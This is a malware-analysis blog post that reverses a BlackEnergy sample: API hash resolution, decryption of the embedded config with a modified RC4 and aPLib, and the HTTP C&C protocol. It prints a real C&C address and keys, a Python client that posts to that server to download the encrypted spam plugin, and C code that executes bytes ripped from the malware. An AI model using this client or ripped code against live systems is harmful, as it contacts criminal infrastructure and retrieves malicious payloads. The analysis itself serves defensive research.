Last week I wanted to do some reverse engineering, so I picked a sample called 11.exe whose MD5 hash is 92c52a4e6dda119e73240b17100abf1f (4116da5e629e1fad70ee415f9739af5b after unpacking). I’m not going to detail the unpacking process since it is a classic RunPE. In this article I’m going to explain how to extract the configuration and how to query the C&C to grab plugins.
IDA idb (v6.4) here
When you open the sample in IDA, you immediately notice that it has very few imports. Right at the start, the following pattern appears numerous times:
The first push is a “hash”. The code then calls a function that returns an address, and directly calls eax.
So we can name that function GetProcByHash. First, we have to identify the “hash” function, so we look inside GetProcByHash (40162Eh).
At the beginning of a loop, we notice a call that looks interesting.
No doubt, it is the “hash” function.
We now face multiple solutions:
I chose the second option and created code to enumerate all exported names in ASM.
The code just takes a DLL name as input, loads it, and computes the “hash” of each exported function. Code available here
$ wine buildhash.exe kernel32.dll | head
AcquireSRWLockExclusive 0x593cb506
AcquireSRWLockShared 0x3634926f
ActivateActCtx 0x5147f60f
AddAtomA 0x1e1865e5
AddAtomW 0x1e1865f3
AddConsoleAliasA 0x06dc97e5
AddConsoleAliasW 0x06dc97f3
...
We computed hashes for a couple of Windows libraries (kernel32.dll, user32.dll, advapi32.dll, ntdll.dll, ws2_32.dll, wininet.dll). Now we have to import them into IDA as an enumeration.
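#!/usr/bin/env python
# -*- coding: utf-8 -*-
# IDAPython (IDA 6.x, Python 2): import the precomputed hashes as an enum.
import idaapi
import idc

# Create an enum named "import" whose members are displayed in hex.
enum_id = idc.AddEnum(0, "import", idaapi.hexflag())
for line in open('hash_list', 'r'):
    line = line.strip()
    if not line:
        continue
    # Each line is "<export name> <hash in hex>".
    (name, value) = line.split(' ')
    idc.AddConstEx(enum_id, "hash_%s" % name, int(value, 16), idaapi.BADADDR)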
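Outside of IDA, the same hash list can be loaded into a dictionary to resolve a pushed constant by hand. The following is a minimal Python 3 sketch, assuming the "name hash" line format printed by buildhash.exe; the function name load_hash_list is hypothetical, and if two exports ever share a hash, the later one silently wins.

```python
def load_hash_list(lines):
    """Map each hash value to its export name ("<name> <hex hash>" per line)."""
    table = {}
    for line in lines:
        line = line.strip()
        # Skip blank lines and the "..." truncation marker.
        if not line or line == "...":
            continue
        name, value = line.split()
        table[int(value, 16)] = name
    return table


# Sample lines copied from the kernel32.dll listing shown earlier.
sample = """\
AddAtomA 0x1e1865e5
AddAtomW 0x1e1865f3
AddConsoleAliasA 0x06dc97e5
"""

hashes = load_hash_list(sample.splitlines())
print(hashes[0x1e1865e5])  # AddAtomA
```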
During the writing of this small IDA script I found some other elegant solutions
https://www.mandiant.com/blog/precalculated-string-hashes-reverse-engineering-shellcode/
After running the script, we can press the “m” key on a hash constant to get the function name.
Now we can really start to work.
While scrolling through the data, something looks suspicious: a 264-byte block of data with a cross-reference at its beginning.
Following the reference, we arrive at the function 4058ACh (DecConfigStartThrAndWait). It passes the config as arg0 to the function 4029ECh (decode_config).
This loop has 2 interesting calls:
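To get a better view, I extracted the config from the binary:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys

if __name__ == "__main__":
    # Binary mode, so the bytes are read untouched on every platform.
    fp = open(sys.argv[1], 'rb')
    # File offset of the 264-byte config block in the unpacked sample.
    fp.seek(0x65C8)
    sys.stdout.write(fp.read(264))
    fp.close()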
./python extract_config.py 11.u.exe | hd
00000000 60 01 00 00 e7 00 00 00 10 00 00 00 00 00 00 00 |`...............|
00000010 5c f6 ee 79 2c df 05 e1 ba 2b 63 25 c4 1a 5f 10 |\..y,....+c%.._.|
00000020 2b 83 08 14 6f f3 42 18 d7 15 42 50 83 48 fc 47 |+...o.B...BP.H.G|
00000030 05 8b bc 78 97 12 45 f9 0d a4 3d 77 fa e9 7c e0 |...x..E...=w..|.|
00000040 96 fd a6 16 5b 4b a5 79 8e 72 53 8c 56 9c 13 36 |....[K.y.rS.V..6|
00000050 fb de 84 48 ca 06 01 46 ee bf 9f e0 b3 c4 8b 0f |...H...F........|
00000060 ec c5 5d 0d 61 52 9d 87 ca 71 46 70 3a fe b1 a7 |..].aR...qFp:...|
00000070 26 5f ae 0c d4 01 5d e7 c6 8c c1 9d 96 3d 79 da |&_....]......=y.|
00000080 ed 5f d0 ff ae 3b 97 1c 50 01 ca 98 fb eb b0 58 |._...;..P......X|
00000090 d3 17 b8 4d 90 e9 ef 8d f0 9f 04 2c c9 31 b8 a1 |...M.......,.1..|
000000a0 29 9a ff bb 16 ee 97 22 9c 84 f1 58 c7 9d 8f 8d |)......"...X....|
000000b0 8e 0b b2 89 c0 e8 58 e2 e7 85 18 4f bd a7 49 ed |......X....O..I.|
000000c0 8f d8 0f 0d 8a 38 4e 56 3b 72 03 96 01 06 40 68 |.....8NV;r....@h|
000000d0 9d c0 a6 94 c1 10 ad c0 7d 01 e0 2e c0 71 c1 f6 |........}....q..|
000000e0 3f 76 7b ac 2e a8 5d bf 8d 97 46 aa 4f f5 15 a1 |?v{...]...F.O...|
000000f0 fb 25 ce fe c6 f7 30 93 85 e2 06 ee 53 c7 12 77 |.%....0.....S..w|
00000100 d9 b0 d4 46 ee a0 33 00 |...F..3.|
By looking at the code, we can extract the structure used by the config data
------------ ------------------------------------------------- ----------------
**Offset**   **Value**                                         **Comment**
0x00         0x0160                                            Final len
0x04         0xe7                                              Compressed len
0x08         0x10                                              Key len
0x10         5c f6 ee 79 2c df 05 e1 ba 2b 63 25 c4 1a 5f 10   Key value
0x20                                                           Config data
------------ ------------------------------------------------- ----------------
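The layout above can be read with a few lines of Python 3. This is only a sketch under assumptions: the three length fields are treated as little-endian 32-bit integers (which matches the bytes 60 01 00 00 decoding to 0x160), the data is taken to start at the fixed offset 0x20, and the function name parse_config_block is hypothetical.

```python
import struct


def parse_config_block(blob):
    """Split the raw config block into (final_len, comp_len, key, data)."""
    # Three little-endian 32-bit lengths at offsets 0x00, 0x04 and 0x08.
    final_len, comp_len, key_len = struct.unpack_from("<III", blob, 0)
    key = blob[0x10:0x10 + key_len]
    # Everything from 0x20 onward is the encrypted, compressed config.
    data = blob[0x20:]
    return final_len, comp_len, key, data


# Header, key and the first eight data bytes from the hex dump above.
blob = bytes.fromhex(
    "60010000e70000001000000000000000"
    "5cf6ee792cdf05e1ba2b6325c41a5f10"
    "2b8308146ff34218"
)
final_len, comp_len, key, data = parse_config_block(blob)
print(hex(final_len), hex(comp_len), key.hex())
```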
Now we have to identify the encryption algorithm.
Looking at the first call, we notice that it looks like the RC4 KSA, but with a modification.
Original RC4 pseudocode from Wikipedia:
for i from 0 to 255
    S[i] := i
endfor
j := 0
for i from 0 to 255
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap values of S[i] and S[j]
endfor
BlackEnergy RC4 init code:
def rc4_init(key):
    # No swaps and no running index j: each entry is just XORed with a key byte.
    box = range(256)
    for i in range(256):
        box[i] = (box[i] ^ ord(key[i % len(key)])) % 256
    return box
The PRGA is the same as the RC4 one from Wikipedia.
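To make the difference concrete, here is a Python 3 sketch that puts both key schedules side by side and runs the unchanged PRGA on the first four encrypted bytes of the config (offset 0x20 in the dump). The function names are hypothetical; the key and ciphertext bytes are copied from the hex dump above.

```python
def ksa_standard(key):
    """Textbook RC4 key schedule: a key-driven shuffle of 0..255."""
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]
    return box


def ksa_blackenergy(key):
    """Modified schedule seen in the sample: XOR with the key, no swaps."""
    return [i ^ key[i % len(key)] for i in range(256)]


def prga_xor(box, data):
    """Standard RC4 PRGA, XORing the keystream into data."""
    box = list(box)  # work on a copy so the caller's box is untouched
    x = y = 0
    out = bytearray()
    for byte in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(byte ^ box[(box[x] + box[y]) % 256])
    return bytes(out)


key = bytes.fromhex("5cf6ee792cdf05e1ba2b6325c41a5f10")
cipher = bytes.fromhex("2b830814")  # first four bytes at offset 0x20
print(prga_xor(ksa_blackenergy(key), cipher))  # b'<\x00?x'
```

The output matches the start of the decrypted data, where the leading "<" is followed by a zero byte that belongs to the compression layer.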
With this information we can write a script to decode the configuration:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script: decrypt the extracted config block.
import sys

def arc4(key, data):
    # Modified key schedule: each box entry is XORed with a key byte, no swaps.
    box = range(256)
    for i in range(256):
        box[i] = (box[i] ^ ord(key[i % len(key)])) % 256
    # Standard RC4 PRGA.
    x = y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)

if __name__ == "__main__":
    fp = open(sys.argv[1], 'rb')
    fp.seek(0x10)          # skip the length fields
    key = fp.read(0x10)    # 16-byte key
    data = fp.read()       # encrypted, compressed config
    fp.close()
    sys.stdout.write(arc4(key, data))
./python decode_config.py config | hd
00000000 3c 00 3f 78 6d 6c 20 76 65 72 00 73 69 6f 6e 3d |<.?xml ver.sion=|
00000010 22 31 2e 74 30 fd f7 cb 63 e3 64 ff e6 67 1e 6f |"1.t0...c.d..g.o|
00000020 77 0c 3e fa 83 73 2d 31 32 35 9f d0 3f 3e 0d 0a |w.>..s-125..?>..|
00000030 19 3c 62 6b 56 6e cd 6c 9c 17 20 7e b4 73 18 11 |.<bkVn.l.. ~.s..|
00000040 3a 0d 47 0f 43 0e 61 21 74 79 70 ff f3 68 b7 7e |:.G.C.a!typ..h.~|
00000050 de 95 2f 0b 47 19 1c 61 64 50 72 c7 3a 2f 10 38 |../.G..adPr.:/.8|
00000060 34 2e 32 e3 cc 31 30 dd 0e 1e 36 7f 83 77 68 69 |4.2..10...6..whi|
00000070 74 65 b1 61 72 d7 b9 63 6c e0 73 2e 7f 70 d0 79 |te.ar..cl.s..p.y|
00000080 2e 43 3c 68 1a 64 68 0d 34 26 29 11 19 84 f8 63 |.C<h.dh.4&)....c|
00000090 6d 53 64 0a 29 2f 0b 48 69 14 5f b7 3f 79 01 31 |mSd.)/.Hi._.?y.1|
000000a0 37 36 33 35 34 ba 04 f8 c7 08 30 39 cf 7f ba f6 |76354.....09....|
000000b0 df e8 f1 18 32 38 df 97 d7 33 ef 1f 76 02 70 8e |....28...3..v.p.|
000000c0 2e 8c e2 83 86 df f3 66 72 fb 71 fb 33 42 d6 0d |.......fr.q.3B..|
000000d0 91 1c 01 62 75 69 6c 64 5f d3 9f e6 30 6f 8e 0d |...build_...0o..|
000000e0 8b 97 53 1c 26 98 00 13 |..S.&...|
000000e8
As you can see, the data seems to be compressed, which explains the final length field in the structure. After the RC4 decryption, the program calls the function located at 402AE9h (inflate). To decompress the config, I decided to rip the code, since I had no clue what the algorithm was.
To rip the code, I opened the binary, read the asm directly, and treated it like a classic shellcode.
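#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* gcc -m32 -fno-stack-protector -z execstack -o rip rip.c */

typedef void (*finflate)(char *src, char *dst);

int main(int argc, char *argv[]){
    FILE *fp;
    char sc_inflate[0x14F];   /* raw bytes of the ripped inflate function */
    char inf[0x1000] = {0};   /* decompressed output, zeroed so printf stops */
    char def[0x1000] = {0};   /* compressed input */

    if(argc != 3){
        fprintf(stderr, "%s <11.u.exe> <config>\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* Load the function body from file offset 0x1ee9. */
    fp = fopen(argv[1], "rb");
    if(fp == NULL){
        perror(argv[1]);
        return EXIT_FAILURE;
    }
    fseek(fp, 0x1ee9, SEEK_SET);
    fread(sc_inflate, 1, sizeof(sc_inflate), fp);
    fclose(fp);

    /* Load the decrypted (still compressed) config. */
    fp = fopen(argv[2], "rb");
    if(fp == NULL){
        perror(argv[2]);
        return EXIT_FAILURE;
    }
    fread(def, 1, sizeof(def), fp);
    fclose(fp);

    /* Run the ripped code directly from the executable stack. */
    finflate inflate = (finflate)sc_inflate;
    inflate(def, inf);
    printf("%s", inf);
    /*fwrite(inf, 1, sizeof(inf), stdout);*/
    return EXIT_SUCCESS;
}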
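A second method consists of using the aPLib library.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include "aplib.h"

int main(int argc, char *argv[]){
    unsigned int size, size2;
    char *src, *dst;
    FILE *fp;

    if(argc != 3){
        fprintf(stderr, "%s <config.dec> <output>\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* Read the whole compressed file into memory. */
    fp = fopen(argv[1], "rb");
    if(fp == NULL){
        perror(argv[1]);
        return EXIT_FAILURE;
    }
    fseek(fp, 0, SEEK_END);
    size = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    src = malloc(size);
    size2 = fread(src, 1, size, fp);
    fclose(fp);

    /* Output buffer sized at 4x the input, which is enough for this config. */
    dst = malloc(size2*4);
    size = aP_depack_asm(src, dst);

    fp = fopen(argv[2], "wb");
    fwrite(dst, 1, size, fp);
    fclose(fp);
    return EXIT_SUCCESS;
}
This outputs: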
./aplib/decompress config.dec config.dec.out
cat config.dec.out
<?xml version="1.0" encoding="windows-1251"?>
<bkernel>
<servers>
<server>
<type>http</type>
<addr>http://84.22.104.162/white/articles.php</addr>
</server>
</servers>
<cmds>
</cmds>
<http_key>17635454375409656001655428185364111</http_key>
<sleepfreq>3</sleepfreq>
<build_id>01</build_id>
</bkernel>
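For readers who cannot link against aPLib, the depack loop is small enough to sketch in Python 3. This follows my understanding of the headerless aPLib bit stream (tag bits read most significant bit first; prefixes 0, 10, 110 and 111 for literal, long match, short match and single-byte copy); it is not the code ripped from the sample, and the function name aplib_depack is hypothetical. The test stream is the first 21 bytes of the decrypted config followed by a hand-made end marker (c0 00), which is an addition for illustration only.

```python
def aplib_depack(src):
    """Decompress a headerless aPLib stream and return the output bytes."""
    src = bytes(src)
    out = bytearray()
    pos = 0           # read position in src
    tag = 0           # current tag byte
    bits_left = 0     # unread bits in the tag byte

    def get_bit():
        nonlocal pos, tag, bits_left
        if bits_left == 0:
            tag = src[pos]
            pos += 1
            bits_left = 8
        bits_left -= 1
        bit = (tag >> 7) & 1
        tag = (tag << 1) & 0xFF
        return bit

    def get_gamma():
        # Variable-length number: data bit, continue bit, data bit, ...
        value = 1
        while True:
            value = (value << 1) | get_bit()
            if not get_bit():
                return value

    def copy(offset, length):
        # Byte by byte, so overlapping copies repeat the pattern.
        for _ in range(length):
            out.append(out[-offset])

    last_offset = 0
    after_match = False       # True right after a match was emitted

    out.append(src[pos])      # the first byte is always a literal
    pos += 1
    while True:
        if not get_bit():                     # 0: literal byte
            out.append(src[pos])
            pos += 1
            after_match = False
        elif not get_bit():                   # 10: long match
            gamma = get_gamma()
            if not after_match and gamma == 2:
                copy(last_offset, get_gamma())    # reuse previous offset
            else:
                gamma -= 2 if after_match else 3
                offset = (gamma << 8) | src[pos]
                pos += 1
                length = get_gamma()
                if offset >= 32000:
                    length += 1
                if offset >= 1280:
                    length += 1
                if offset < 128:
                    length += 2
                copy(offset, length)
                last_offset = offset
            after_match = True
        elif not get_bit():                   # 110: short match or end
            byte = src[pos]
            pos += 1
            offset = byte >> 1
            if offset == 0:
                break                         # end-of-stream marker
            copy(offset, 2 + (byte & 1))
            last_offset = offset
            after_match = True
        else:                                 # 111: one byte, 4-bit offset
            offset = 0
            for _ in range(4):
                offset = (offset << 1) | get_bit()
            out.append(out[-offset] if offset else 0)
            after_match = False
    return bytes(out)


# First 21 bytes of the decrypted config + hand-made end marker "c0 00".
stream = bytes.fromhex("3c003f786d6c207665720073696f6e3d22312e7430" "c000")
print(aplib_depack(stream))  # b'<?xml version="1.0"'
```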
I failed here: I did not save the pcap file, and by the time I decided to write this article, the C&C was already down…
It communicates using the HTTP protocol by sending POST requests.
The POST contains one parameter called “hnp”.
“hnp” contains the real parameters, encrypted with the key found in the config and encoded in hex format.
The parameter string used to grab the plugin config is:
id=B595735B55773320500E7F8202B118F5&ln=en&cn=US&nt=2600&bid=01
It returns the configuration, RC4-encrypted with the id parameter as the key. I do not have a backup of the plugin configuration, but it contains the name of each plugin with its version, parameters and key.
The parameter string used to grab a plugin is the same with getp added in front (here for the plugin “s”):
getp=s&id=B595735B55773320500E7F8202B118F5&ln=en&cn=US&nt=2600&bid=01
It returns a DLL encrypted with RC4, using the key specified in the configuration received earlier.
A small script to query the C&C and grab the configuration or the plugin:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script: request the plugin configuration from the C&C.
import sys
import requests

def arc4(key, data):
    # Modified key schedule: each box entry is XORed with a key byte, no swaps.
    box = range(256)
    for i in range(256):
        box[i] = (box[i] ^ ord(key[i % len(key)])) % 256
    # Standard RC4 PRGA.
    x = y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)

if __name__ == "__main__":
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)'}
    server_key = "17635454375409656001655428185364111"   # http_key from the config
    client_key = "B595735B55773320500E7F8202B118F5"      # id parameter
    plugin_key = "e69ac82a011a69ce912500ea78e95dd4"      # decrypts the plugin DLL
    # Swap get_config for get_module_s below to fetch the plugin "s" instead.
    get_module_s = "getp=s&id=%s&ln=en&cn=US&nt=2600&bid=01" % (client_key)
    get_config = "id=%s&ln=en&cn=US&nt=2600&bid=01" % (client_key)
    payload = {'hnp': arc4(server_key, get_config).encode('hex')}
    r = requests.post("http://84.22.104.162/white/articles.php", data=payload, headers=headers)
    # The answer is encrypted with the id parameter as the key.
    data = arc4(client_key, r.content)
    sys.stdout.write(data)
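Since the server no longer answers, the request encoding can still be exercised offline. The sketch below is a Python 3 restatement of the “hnp” construction (modified RC4 with the http_key, then hex encoding) together with its inverse; the helper names be_rc4, build_hnp and read_hnp are hypothetical, and nothing here touches the network.

```python
def be_rc4(key, data):
    """Modified RC4 from the sample: XOR-only key schedule, standard PRGA."""
    box = [i ^ key[i % len(key)] for i in range(256)]
    x = y = 0
    out = bytearray()
    for byte in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(byte ^ box[(box[x] + box[y]) % 256])
    return bytes(out)


def build_hnp(server_key, params):
    """Encrypt the parameter string and hex-encode it for the POST body."""
    return be_rc4(server_key.encode("ascii"), params.encode("ascii")).hex()


def read_hnp(server_key, hnp):
    """Inverse of build_hnp, handy for decoding captured requests."""
    return be_rc4(server_key.encode("ascii"), bytes.fromhex(hnp)).decode("ascii")


server_key = "17635454375409656001655428185364111"
params = "id=B595735B55773320500E7F8202B118F5&ln=en&cn=US&nt=2600&bid=01"

hnp = build_hnp(server_key, params)
print(hnp)
print(read_hnp(server_key, hnp))
```

Because the cipher is a plain XOR with the keystream, the same routine both encrypts and decrypts, which is why read_hnp only has to undo the hex encoding first.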
When the C&C was up, only one plugin was distributed and it was called “s”.
./md5sum s.dll
e01810f4cedbaf045cd625b82ec05c62 s.dll
I am not going to reverse the plugin here, but it is a classic plugin used to send spam. It checks whether the infected machine can reach some well-known SMTP servers such as hotmail.com, google.com and mail.com. If it manages to connect to one of those servers, it fetches the email list and the template from the C&C server.